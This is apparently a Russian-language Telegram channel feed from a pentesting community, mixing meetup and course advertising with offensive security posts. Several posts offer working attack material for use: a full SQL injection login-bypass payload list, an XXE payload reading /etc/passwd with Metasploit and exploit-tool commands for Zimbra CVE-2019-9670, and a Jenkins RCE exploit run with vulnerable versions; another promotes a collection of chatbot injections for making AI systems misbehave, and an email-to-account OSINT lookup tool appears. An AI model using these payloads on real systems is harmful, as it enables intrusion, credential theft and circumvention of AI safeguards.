NETRUNNER GROUP
2.97K subscribers
268 photos
32 videos
22 files
164 links
> По вопросам обращаться @TripiniFKYL <
Заместитель - @netrunner_1G
Discord - https://discord.gg/tqmrqRYPW5
Чат - https://t.iss.one/+tkuqqLpFQPVhM2Zi
Сайт - https://cybernetrunner.ru (ведется разработка новой платформы)
Download Telegram
https://vk.com/cyberhackerss приглашает студентов-спикеров и слушателей посетить встречу-конференцию «Networks and RadioHack Meet-up»!

🗓 Когда: 5 марта в 12:00
📍где: Арт-пространство Графит (Фудхолл Графит
Электродная ул., 2, стр. 32)
🎟 бесплатная проходка для всех спикеров и слушателей
👥 количество мест: 40
📌 регистрация: https://t.iss.one/kibhack_bot

«Networks and RadioHack Meet-up» - это первая встреча-конференция от КибХак, на которой мы послушаем доклады, пообщаемся и, конечно же, выпьем ̶п̶и̶в̶а̶ лимонада (или все-таки пива). А еще это первая для нас встреча, которая будет организована за пределами ВУЗа.

Мероприятие будет полезным и для тех, кто ищет единомышленников для создания проектов, разработок, исследований, и для новичков, только начавших исследовать радиохакинг. Предполагаемые темы докладов для спикеров:
• технология SDR, RFID
• сети
• радиопротоколы, реверс радиопротоколов
• системы контроля доступа
• аппаратное обеспечение и разработка открытого исходный кода для контроллеров от исследователей, экспертов и интересующихся с последующим открытым обсуждением вопросов.

Если ты хочешь выступить с докладом или просто провести время с пользой и послушать выступления — регистрируйся через бота по этой ссылке: https://t.iss.one/kibhack_bot.

Окончательный список тем и другие обновления ты найдешь в беседах митапа и в [club192769069|группе] в ВК.
3
Forwarded from Похек
SQL injection auth bypass list

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

#sqli
🔥152😍2❤‍🔥1👍1
udon

Инструмент на Go для поиска поддоменов на основе Google Analytics ID

Установка:
go install github.com/dhn/udon@latest

Использование:
udon -silent -json -s UA-ID | jq -c

#tools
🔥7❤‍🔥1
💬🤖💉 Chatbot Injections & Exploits🐱💻

Добро пожаловать в репозиторий инъекций и эксплойтов ChatBot. Это репозиторий представляет собой коллекцию возможных инъекций и эксплойтов, позволяющих "обмануть" любой ChatBot и заставить его делать то, что он не должен делать. Это репозиторий находится в процессе работы и будет регулярно обновляться. Если у вас есть какие-либо предложения или вы хотите внести свой вклад, пожалуйста, не стесняйтесь открыть проблему или запрос на исправление.

#chatgpt
🔥4👍3
Forwarded from Похек
XXE to RCE Zimbra CVE-2019-9670

Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)

Payload XXE:
 xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="https://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

Ниже приведу парочку примеров, как эксплуатировать эту вулну.
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rce
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit

Arambiz - эксплойт на Python3:
 clone https://github.com/oppsec/arbimz.git
pip3 install -r requirements.txt
python3 main.py --url https://example.com/

Zaber - эксплойт на Go:
 install github.com/oppsec/zaber@latest
zaber -u https://example.com
Если у вас не находит бинарь, то пропишите абсолютный путь.
 -u https://example.com
А после работ не забудьте добавить $HOME/go/bin/ в свой PATH 😉


Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.

Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
KrbRelayUp

Оболочка для Rubeus и KrbRelay для упрощения следующих атак:
1. Создание нового аккаунта на локальной машине
2. Принудительная авторизация учетной записи на локальной машине
3. Kerberos relay to LDAP
4. Добавление привилегий RBCD и получение Service Ticket (ST) на локальной машине
5. Используя указанный ST для аутентификации в локальном Service Manager и создания нового процесса, как NT/SYSTEM
6. Kerberos relay to ADCS (HTTP)
7. Генерирование запроса на сертификат от имени учетной записи локальной машины, отправка запроса в ADCS Web Enrollment для получения сертификата для учетной записи локальной машины.
8. Генерирование нового KeyCredential и добавление его к атрибуту msDS-KeyCredentialLink учетной записи локальной машины
9. Использование полученного сертификата и KeyCredential для получения TGT для учетной записи локальной машины через PKInit
10. Использование TGT для получения Service Ticket (ST) на локальной машине через S4U2Self и TGSSUB

#tools
❤‍🔥10👍1
Forwarded from Похек
Foxit PDF Reader CVE-2022-28672 RCE: разбор уязвимости

В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость use-after-free и несколько других багов в Foxit PDF Reader во время фаззинга. Мы смогли успешно использовать эту уязвимость для удаленного выполнения кода в Foxit PDF Reader.

#CVE #RCE #моястатья
👍6🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Holehe OSINT - Email to Registered Accounts

Эффективный поиск зарегистрированных учетных записей из электронных писем. Holehe проверяет, прикреплено ли письмо к аккаунту на таких сайтах, как twitter, instagram, imgur и более чем 120 других.

Установка:
pip3 install holehe

или

git clone https://github.com/megadose/holehe.git
cd holehe/
python3 setup.py install

Holehe можно запускать из CLI и быстро встраивать в существующие python-приложения.

#tools #osint
5👍1🔥1
А теперь серьезно
Пора выходить на новый уровень 🔼

Мы меняем концепцию, углубляемся в репетиторство.

С сегодняшнего дня NetRunner начинает углублено сотрудничать с RESOLUTE ATTACK.
И мы рады заявить что их курс, после которого вы получите сертификат PRTT, на данный момент - ТОП 1 в России по пентесту.

Так как это очень серьезный курс и обычному Kiddie ("новокеку") будет очень сложно туда залететь , мы под руководством RA создаем подготовительный курс с необходимой БАЗОЙ !!!
Информации будет больше, чем мы давали ранее.
Это будет больше похоже на репетиторство, чем на обычный поточный курс.

У вас будет:
- новый ментор (и не один)
- структурированная база данных со всей нужной информацией
- занятия 2 раза в неделю

Вместе с RESOLUTE ATTACK мы взяли на себя полномочия популяризации pentest`а в СНГ и будем двигаться бок о бок.

Развивайся вместе с нами!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25❤‍🔥9👍9
webanalyze

Это порт Wappalyzer в Go. Этот инструмент разработан с учетом производительности и позволяет тестировать огромные списки хостов.

Установка:
Установочный файл с Github

Сбилдить:
go install -v github.com/rverton/webanalyze/cmd/webanalyze@latest
webanalyze -update
webanalyze -h

Использование webanalyze:
  -apps string
-crawl int
-host string
-hosts string
-output string
-search
-silent
-update
-worker int

Docker:
git clone https://github.com/rverton/webanalyze.git
docker build -t webanalyze:latest webanalyze
docker run -it webanalyze:latest -h
6👍2
Наш любимый учитель @fir3wall1 решил вести свой пентестерский блог

Не могу вам его не порекомендовать , там будет много годного контента для +- знающих ребят.

Залетайте

#не_реклама
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4😍4
Jenkins RCE 2019
CVE-2018-1000861
CVE-2019-1003005
CVE-2019-1003029

Использование:
$ curl -s -I https://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py https://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Уязвимые версии:
Jenkins 2.53
Jenkins 2.122
Jenkins 2.137
Jenkins 2.138 with ANONYMOUS_READ enable
Jenkins 2.152 with ANONYMOUS_READ enable
Jenkins 2.153 with ANONYMOUS_READ enable
Script Security Plugin 1.43
Script Security Plugin 1.48
❤‍🔥5👍4
Всем хай 👋

Хочу показать вам всего 1/3 - 1/4 подготовительного курса к PRTT который мы вам готовим ☺️

Ждите начало предпродаж на этой неделе, будет очень много годного контента ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥12👍6🔥6
Предпродажа открыта

Расскажу немного больше о курсе:
1) Вам будет постепенно и структурировано выдаваться информация. Так, что бы вы могли ее комфортно изучить.
2) Раз в неделю наши менторы будут в формате онлайн отвечать на ваши вопросы.
3) Постепенно мы перейдем на новую платформу. (сюрприз) 😁
4) Вся программа одобрена RESOLUTE ATTACK и сделана с их помощью, поэтому в качестве и актуальности информации можете не сомневаться.
5) Тем, кто продвинулся выше ступени Script-Kiddie, мы даем 10% скидку на курс 🫶 (вы реально молодцы парни)
6) Этот курс - репетиторство.
Он поможет человеку, который "ноль" в пентесте подняться до уровня успешного прохождения PRTT.

Стоимость курса: 15000р
Начало 25 мая.
Рассчитан он на 3 месяца, поэтому есть вариант оплаты по месяцам.

Ответы на вопросы:
Часть 1
Часть 2

По вопросам и покупке писать: @TripiniFKYL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥75🤔3😍2
Forwarded from CyberYozh
Media is too big
VIEW IN TELEGRAM
Пентест 1С-Битрикс. Прямой эфир.
Спикер: Firewall

👍 Начало трансляции в 16:00

В рамках доклада спикер от NetRunner - (партнеров RESOLUTE ATTACK) - Firewall расскажет про способы нахождения уязвимостей без методички, атак на php скрипты разработчиков и их поиск.

🎁 В качестве приятного дополнения - так же расскажет, как обходить капчу в 1С-Битрикс.

Канал Firewall | RESOLUTE ATTACK | NetRunner
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥6👍3❤‍🔥2
У меня скопилось довольно много повторяющихся вопросов, поэтому вот ответы на них:

1) Будет ли этот курс заменять старую программу обучения?

Да, будет, и информации будет больше. В целом, мы в 3 месяца уложили довольно много материала.

2) Сколько будет домашних заданий. И будут ли они вообще?

Вам предстоит сделать 24 домашних задания, которые наши менторы любезно проверят, и дадут оценку или скажут что исправить.

3) Будут-ли какие то бонусы, привилегии ученикам?

Не назвал бы это большой привилегией, но тем, кто до начала полностью оплатит курс, мы выдадим больше домашних заданий просто в качестве бонуса.
Если мы еще что-то надумаем, то обязательно напишу.

4) Когда будут проходить стримы и во сколько?

Предварительно стримы, где мы будем отвечать на ваши вопросы, будут проходить по субботам, в районе вечера или чуть раньше по МСК.

5) Готов ли у вас этот курс, или вы еще его делаете?

Курс полностью готов, мы рано начади предпродажу, так как не ожидали на это такого спроса, в связи с этим хочу добавить, что лучше записываться заранее, чем раньше, тем лучше.
Можем закрыть набор, когда наберется достаточное количество человек.

6) Нужно ли что-то учить до начала курса?

Нет, и еще раз нет, этот курс рассчитан на полных "нулей" в ИБ и для тех, кто имеет неполноценную базу со знаниями.

Завтра сделаю еще пост, где отвечу на остальные частые вопросы 🔼
Писать: @TripiniFKYL
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥7👍5🔥4
Ответы на частые вопросы
Часть 2

1) Что если, я не буду успевать осваивать программу?

У вас останется вся база с информацией, методички и так далее. Так же, вы не потеряете связь с менторами.
Можете осваивать программу в удобном вам темпе.

2) Что если, я из другой страны и не могу оплатить?

Можно оплатить криптой. Есть разные варианты, пишите не стесняйтесь, подскажу)

3) Куда делается наиболее большой упор в программе?

Упор в web пентест, а также на приобретение базовых навыков, чтобы было хорошие понимание и хороший скилл в этой сфере. Так как курс рассчитан даже если знаний совсем нет.

4) Что я буду уметь после прохождения курса?

• Администрировать Linux сервера.
• Администрировать Web сервера.
• Проводить web пентест и анализ защищённости информационных систем.
• Участвовать в bug-bounty программах.
• Успешно развиваться и реализовыватся в ИБ и IT сфере.
• Успешно понимать материал из курса PRTT.
• Пользоваться Kali Linux и его инструментами.
• Писать свои скрипты для автоматизации своих действий, пентеста и анализа защищённости.
• Производить атаки внутри локальной сети: mitm, dns, arp spoofing и т.д.

И многое другое.

Задавайте свои вопросы тут: @TripiniFKYL 🔼
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥7👍54
Nishang

Это фреймворк и набор скриптов, позволяющий использовать PowerShell для пентеста и red team. Nishang полезен на всех этапах тестирования на проникновение.1

#tools
👍43🔥3
Сообщество по информационной безопасности «КибХак» организует хакатон и приглашает тебя принять в нем участие!

Если ты учишься в университете или только планируешь в него поступать - мы ждем тебя!

👥 Партнеры мероприятия — Cloud и BI.ZONE
🗓 С 11 по 18 мая
📍 В формате очно/онлайн
🏫 Место проведения: РТУ МИРЭА

Что будет на хакатоне:
• Работа с облачными сервисами и технологиями
•Студентам предстоит лицом к лицу столкнуться с кейсом, затрагивающим аспекты пентеста, SOC и форензики.
• Шанс выиграть редкий и эксклюзивный мерч и проявить себя в присутствии представителей компаний-партнëров.

Зарегестрироваться можно по ссылке:
https://forms.gle/wYXbq99GtaP3L17Z9

Вступай в группу в Telegram, где будет вся актуальная информация: https://vk.cc/cnmka5
👍7🔥3
Добавляем обороты

CyberYozh – новый партнер.

Мы запланировали серию эксклюзивных статей, на канале ежей, посвященных ключевым навыкам, которые необходимы начинающим специалистам по безопасности. Автор статей – наш ментор K1ber, а это гарантия качественных материалов.

И это еще не все. Мы готовим специальный проект, который будет для вас приятным сюрпризом 🫶

Следите за каналом наших партнеров 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥12🔥8👍51